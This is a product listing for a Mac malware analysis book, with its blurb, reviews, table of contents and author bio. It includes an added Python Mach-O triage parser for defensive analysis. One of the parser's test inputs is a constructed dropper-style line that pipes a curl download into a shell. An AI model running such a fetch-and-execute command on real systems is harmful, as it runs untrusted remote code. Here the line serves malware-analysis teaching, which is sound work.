
Art of Mac Malware, Volume 1: The Guide to Analyzing Malicious Software [Paperback]

  • Format: Paperback / softback, 328 pages, height x width: 235x178 mm
  • Publication date: 12-Jul-2022
  • Publisher: No Starch Press, US
  • ISBN-10: 1718501943
  • ISBN-13: 9781718501942
The Art of Mac Malware is a comprehensive guide to the threats facing Apple computers and the foundational knowledge needed to become a proficient Mac malware analyst. Using real-world examples, the book surveys the malware's various infection methods and teaches the static and dynamic analysis tools needed to examine malware you may find in the wild.

A comprehensive guide to the threats facing Apple computers and the foundational knowledge needed to become a proficient Mac malware analyst.

Defenders must fully understand how malicious software works if they hope to stay ahead of the increasingly sophisticated threats facing Apple products today. The Art of Mac Malware: The Guide to Analyzing Malicious Software is a comprehensive handbook to cracking open these malicious programs and seeing what’s inside. 

Discover the secrets of nation-state backdoors, destructive ransomware, and subversive cryptocurrency miners as you uncover their infection methods, persistence strategies, and insidious capabilities. Then work with and extend foundational reverse-engineering tools to extract and decrypt embedded strings, unpack protected Mach-O malware, and even reconstruct binary code. Next, using a debugger, you'll execute the malware, instruction by instruction, to discover exactly how it operates. In the book's final section, you'll put these lessons into practice by analyzing a complex Mac malware specimen on your own.

You'll learn to:

  • Recognize common infection vectors, persistence mechanisms, and payloads leveraged by Mac malware
  • Triage unknown samples in order to quickly classify them as benign or malicious
  • Work with static analysis tools, including disassemblers, in order to study malicious scripts and compiled binaries
  • Leverage dynamic analysis tools, such as monitoring tools and debuggers, to gain further insight into sophisticated threats
  • Quickly identify and bypass anti-analysis techniques aimed at thwarting your analysis attempts
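
As an added illustration of the triage and static-analysis skills in the list above (example code written for this listing, not code from the book or from Objective-See): a small Python parser that classifies an unknown sample by its leading bytes, separating shebang scripts, universal (fat) wrappers and 64-bit Mach-O files, and for the latter reads the header and walks the load commands to recover segment names, linked dylibs, the LC_MAIN entry offset and whether an LC_CODE_SIGNATURE command is present. The structure layouts and constants are the public ones from `<mach-o/loader.h>` and `<mach-o/fat.h>`; the sample binary is constructed in memory (it is not a real specimen) so the parser runs offline.

```python
import struct

# Constants from <mach-o/loader.h> and <mach-o/fat.h>.
MH_MAGIC = 0xFEEDFACE      # 32-bit Mach-O, little-endian on disk
MH_MAGIC_64 = 0xFEEDFACF   # 64-bit Mach-O
FAT_MAGIC = 0xCAFEBABE     # universal ("fat") wrapper, big-endian on disk
MH_PIE = 0x200000          # header flag: position-independent executable

LC_SEGMENT_64 = 0x19
LC_LOAD_DYLIB = 0x0C
LC_CODE_SIGNATURE = 0x1D
LC_MAIN = 0x80000028

CPU_NAMES = {0x01000007: "x86_64", 0x0100000C: "arm64"}
FILETYPES = {0x2: "MH_EXECUTE", 0x6: "MH_DYLIB", 0x8: "MH_BUNDLE"}

MACH_HEADER_64 = struct.Struct("<IiiIIIII")   # magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags, reserved


def parse_macho64(data):
    """Read the 64-bit header and walk the load commands that follow it."""
    if len(data) < MACH_HEADER_64.size:
        raise ValueError("truncated Mach-O header")
    _, cputype, _, filetype, ncmds, sizeofcmds, flags, _ = MACH_HEADER_64.unpack_from(data, 0)
    info = {
        "kind": "macho64",
        "cputype": CPU_NAMES.get(cputype, hex(cputype)),
        "filetype": FILETYPES.get(filetype, hex(filetype)),
        "pie": bool(flags & MH_PIE),
        "segments": [],
        "dylibs": [],
        "entry_offset": None,
        "code_signed": False,
    }
    off = MACH_HEADER_64.size
    for _ in range(ncmds):
        if off + 8 > len(data):
            raise ValueError("truncated load command")
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        # cmdsize < 8 would never advance; one past EOF is a truncated or crafted file.
        if cmdsize < 8 or off + cmdsize > len(data):
            raise ValueError("bad cmdsize at offset %#x" % off)
        if cmd == LC_SEGMENT_64:
            segname = data[off + 8:off + 24].split(b"\0", 1)[0]
            info["segments"].append(segname.decode("ascii", "replace"))
        elif cmd == LC_LOAD_DYLIB:
            # dylib.name is an lc_str: byte offset of the path, relative to the command start.
            name_off = struct.unpack_from("<I", data, off + 8)[0]
            if not 8 <= name_off < cmdsize:
                raise ValueError("bad lc_str offset")
            name = data[off + name_off:off + cmdsize].split(b"\0", 1)[0]
            info["dylibs"].append(name.decode("utf-8", "replace"))
        elif cmd == LC_MAIN:
            info["entry_offset"] = struct.unpack_from("<Q", data, off + 8)[0]
        elif cmd == LC_CODE_SIGNATURE:
            info["code_signed"] = True
        off += cmdsize
    return info


def triage(data):
    """First-pass classification of an unknown sample from its leading bytes."""
    if data.startswith(b"#!"):
        first = data.split(b"\n", 1)[0][2:].strip()
        return {"kind": "script", "interpreter": first.decode("utf-8", "replace")}
    if len(data) < 8:
        return {"kind": "unknown"}
    # Note: Java class files share the CAFEBABE magic; a fat header has a small
    # nfat_arch here, a class file has a version number, so check what you found.
    if struct.unpack_from(">I", data)[0] == FAT_MAGIC:
        return {"kind": "fat", "nfat_arch": struct.unpack_from(">I", data, 4)[0]}
    magic = struct.unpack_from("<I", data)[0]
    if magic == MH_MAGIC_64:
        return parse_macho64(data)
    if magic == MH_MAGIC:
        return {"kind": "macho32"}
    return {"kind": "unknown"}


def build_sample():
    """Constructed (not real-world) arm64 executable with three load commands."""
    seg = struct.pack("<II16sQQQQiiII", LC_SEGMENT_64, 72, b"__TEXT",
                      0x100000000, 0x4000, 0, 0x4000, 5, 5, 0, 0)
    path = b"/usr/lib/libSystem.B.dylib\0"
    pad = (-len(path)) % 8                      # cmdsize is padded to 8 bytes
    dylib = struct.pack("<IIIIII", LC_LOAD_DYLIB, 24 + len(path) + pad,
                        24, 2, 0x05280000, 0x00010000) + path + b"\0" * pad
    main = struct.pack("<IIQQ", LC_MAIN, 24, 0x3F50, 0)
    cmds = seg + dylib + main
    header = MACH_HEADER_64.pack(MH_MAGIC_64, 0x0100000C, 0, 0x2, 3, len(cmds), MH_PIE | 0x85, 0)
    return header + cmds


if __name__ == "__main__":
    for sample in (build_sample(),
                   b"#!/bin/bash\ncurl http://example.invalid | sh\n",   # constructed dropper-style script
                   bytes.fromhex("cafebabe00000002")):                 # constructed fat header, 2 slices
        print(triage(sample))
```

The bounds checks on `cmdsize` and the `lc_str` offset are the part worth keeping: malware authors know analysts script over headers, and a crafted load command table is a cheap way to crash or hang a naive parser. On a real sample you would feed `triage()` the bytes of each slice of a fat file and follow it with `codesign -dvvv` and `otool -l` to cross-check what the parser reports.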

A former NSA hacker and current leader in the field of macOS threat analysis, Patrick Wardle uses real-world examples pulled from his original research. The Art of Mac Malware: The Guide to Analyzing Malicious Software is the definitive resource to battling these ever more prevalent and insidious Apple-focused threats.

Reviews

"[The Art of Mac Malware] serves as a valuable resource for anyone looking to level up their skills to stay on top of the latest macOS threats. Patrick's approachable, educating writing style and extensive knowledge in this field made him the ideal author to write this book." Maria Markstedter, @Fox0x01, Forbes Person Of The Year In Cybersecurity

"Mac doesn't face the same level of malware threat that Windows users experience. However, it is possible to create malware for macOS and the excellent book, The Art of Mac Malware, goes into a lot of detail." Security Boulevard

"Awesome job keeping readers hooked." Tony Lambert, @ForensicITGuy

"An awesome researcher writing for my favorite publisher . . . If you're interested in Mac malware, I highly recommend!" Francisco Donoso, @Francisckrs

Contents

Foreword
Acknowledgments
Introduction
  Who Should Read This Book?
  What You'll Find in This Book
  A Note on Mac Malware Terminology
  A Note on Safely Analyzing Malware
  Additional Resources
    Books
    Websites
  Downloading This Book's Malware Specimens
  Endnotes

PART I: MAC MALWARE BASICS

1 Infection Vectors
  Mac Protections
  Malicious Emails
  Fake Tech and Support
  Fake Updates
  Fake Applications
  Trojanized Applications
  Pirated and Cracked Applications
  Custom URL Schemes
  Office Macros
  Xcode Projects
  Supply Chain Attacks
  Account Compromises of Remote Services
  Exploits
  Physical Access
  Up Next
  Endnotes

2 Persistence
  Login Items
  Launch Agents and Daemons
  Scheduled Jobs and Tasks
    Cron Jobs
    At Jobs
    Periodic Scripts
  Login and Logout Hooks
  Dynamic Libraries
    DYLD_* Environment Variables
    Dylib Proxying
    Dylib Hijacking
  Plug-ins
  Scripts
  Event Monitor Rules
  Reopened Applications
  Application and Binary Modifications
  KnockKnock ... Who's There?
  Up Next
  Endnotes

3 Capabilities
  Categorizing Mac Malware Capabilities
  Survey and Reconnaissance
  Privilege Escalation
    Escaping Sandboxes
    Gaining Root Privileges
  Adware-Related Hijacks and Injections
  Cryptocurrency Miners
  Remote Shells
  Remote Process and Memory Execution
  Remote Download and Upload
  File Encryption
  Stealth
  Other Capabilities
  Up Next
  Endnotes

PART II: MAC MALWARE ANALYSIS

4 Nonbinary Analysis
  Identifying File Types
  Extracting Malicious Files from Distribution Packaging
    Apple Disk Images (.dmg)
    Packages (.pkg)
  Analyzing Scripts
    Bash Shell Scripts
    Python Scripts
    AppleScript
    Perl Scripts
  Microsoft Office Documents
  Applications
  Up Next
  Endnotes

5 Binary Triage
  The Mach-O File Format
    The Header
    The Load Commands
    The Data Segment
  Classifying Mach-O Files
    Hashes
    Code-Signing Information
    Strings
    Objective-C Class Information
  "Nonbinary" Binaries
    Identifying the Tool Used to Build the Binary
    Extracting the Nonbinary Component
  Up Next
  Endnotes

6 Disassembly and Decompilation
  Assembly Language Basics
    Registers
    Assembly Instructions
    Calling Conventions
    The objc_msgSend Function
  Disassembly
    Objective-C Disassembly
    Swift Disassembly
    C/C++ Disassembly
    Control Flow Disassembly
  Decompilation
  Reverse Engineering with Hopper
    Creating a Binary to Analyze
    Loading the Binary
    Exploring the Interface
    Viewing the Disassembly
    Changing the Display Mode
  Up Next
  Endnotes

7 Dynamic Analysis Tools
  Process Monitoring
    The ProcessMonitor Utility
  File Monitoring
    The fs_usage Utility
    The FileMonitor Utility
  Network Monitoring
    macOS's Network Status Monitors
    The Netiquette Utility
    Network Traffic Monitors
  Up Next
  Endnotes

8 Debugging
  Why You Need a Debugger
  The LLDB Debugger
    Starting a Debugger Session
    Controlling Execution
    Using Breakpoints
    Examining All the Things
    Modifying Process State
    LLDB Scripting
  A Sample Debugging Session: Uncovering Hidden Cryptocurrency Mining Logic in an App Store Application
  Up Next
  Endnotes

9 Anti-Analysis
  Anti-Static-Analysis Approaches
    Sensitive Strings Disguised as Constants
    Encrypted Strings
      Locating Obfuscated Strings
      Finding the Deobfuscation Code
      String Deobfuscation via a Hopper Script
      Forcing the Malware to Execute Its Decryption Routine
    Code-Level Obfuscations
      Bypassing Packed Binary Code
      Decrypting Encrypted Binaries
  Anti-Dynamic-Analysis Approaches
    Checking the System Model Name
    Counting the System's Logical and Physical CPUs
    Checking the System's MAC Address
    Checking System Integrity Protection Status
    Detecting or Killing Specific Tools
    Detecting a Debugger
    Preventing Debugging with ptrace
  Bypassing Anti-Dynamic-Analysis Logic
    Modifying the Execution Environment
    Patching the Binary Image
    Modifying the Malware's Instruction Pointer
    Modifying a Register Value
  A Remaining Challenge: Environmentally Generated Keys
  Up Next
  Endnotes

PART III: ANALYZING EVILQUEST

10 EvilQuest's Infection, Triage, and Deobfuscation
  The Infection Vector
  Triage
    Confirming the File Type
    Extracting the Contents
    Exploring the Package
    Extracting Embedded Information from the patch Binary
  Analyzing the Command Line Parameters
    -silent
    -noroot
    -ignrp
  Analyzing Anti-Analysis Logic
    Virtual Machine-Thwarting Logic?
    Debugging-Thwarting Logic
  Obfuscated Strings
  Up Next
  Endnotes

11 EvilQuest's Persistence and Core Functionality Analysis
  Persistence
    Killing Unwanted Processes
    Making Copies of Itself
    Persisting the Copies as Launch Items
    Starting the Launch Items
    The Repersistence Logic
  The Local Viral Infection Logic
    Listing Candidate Files for Infection
    Checking Whether to Infect Each File
    Infecting Target Files
    Executing and Repersisting from Infected Files
    Executing the Infected File's Original Code
  The Remote Communications Logic
    The Mediator and Command and Control Servers
    Remote Tasking Logic
      react_exec (0x1)
      react_save (0x2)
      react_start (0x4)
      react_keys (0x8)
      react_ping (0x10)
      react_host (0x20)
      react_scmd (0x40)
  The File Exfiltration Logic
    Directory Listing Exfiltration
    Certificate and Cryptocurrency File Exfiltration
  File Encryption Logic
  EvilQuest Updates
    Better Anti-Analysis Logic
    Modified Server Addresses
    A Longer List of Security Tools to Terminate
    New Persistence Paths
    A Personal Shoutout
    Better Functions
    Removed Ransomware Logic

Conclusion
Endnotes
Index

About the Author

Patrick Wardle is the creator of the Mac security website and tool suite Objective-See. Having worked at NASA and the NSA, as well as presented at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Patrick is passionate about all things related to macOS security and thus spends his days finding Apple 0days, analyzing macOS malware, and writing free open-source security tools to protect Mac users.